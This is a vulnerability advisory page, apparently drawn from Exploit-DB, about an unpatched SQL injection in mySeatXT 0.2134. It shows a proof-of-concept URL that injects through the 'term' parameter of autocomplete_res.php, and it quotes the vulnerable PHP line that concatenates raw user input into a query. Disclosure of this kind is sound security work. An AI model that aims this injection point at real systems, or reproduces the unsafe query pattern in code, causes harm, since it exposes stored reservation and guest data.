mySeatXT 0.2134

vendor:

mySeatXT

by:

vinicius777

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: mySeatXT

Affected Version From: 0.2134

Affected Version To: 0.2134

Patch Exists: NO

Related CWE: N/A

CPE: mySeatXT

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

A SQL injection vulnerability exists in mySeatXT 0.2134. An attacker can send a specially crafted HTTP request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. The vulnerability is due to the application not properly sanitizing user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability to manipulate or disclose sensitive information in the back-end database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.

Source

Exploit-DB raw data:

########################################################################################
[+] Exploit: mySeatXT 0.2134                                                           #
[+] Author: vinicius777					                               #
[+] Contact: vinicius777 [AT] gmail  @vinicius777_                                     #	                 
[+] Vendor Homepage: http://sourceforge.net/projects/myseat                            #
########################################################################################

  
[1] Sql Injection
 

PoC: http://localhost/mySeatXT/web/ajax/autocomplete_res.php?term=99' ['SQL INJECT']
  


Vulnerable Code:
[+] autocomplete_res.php


$sql = "SELECT * FROM reservations WHERE reservation_guest_name LIKE '".$_GET['term']."%' GROUP BY reservation_guest_name ";
$fetch = mysql_query($sql);



#
#
# Greetz to g0tm1lk and TheColonial.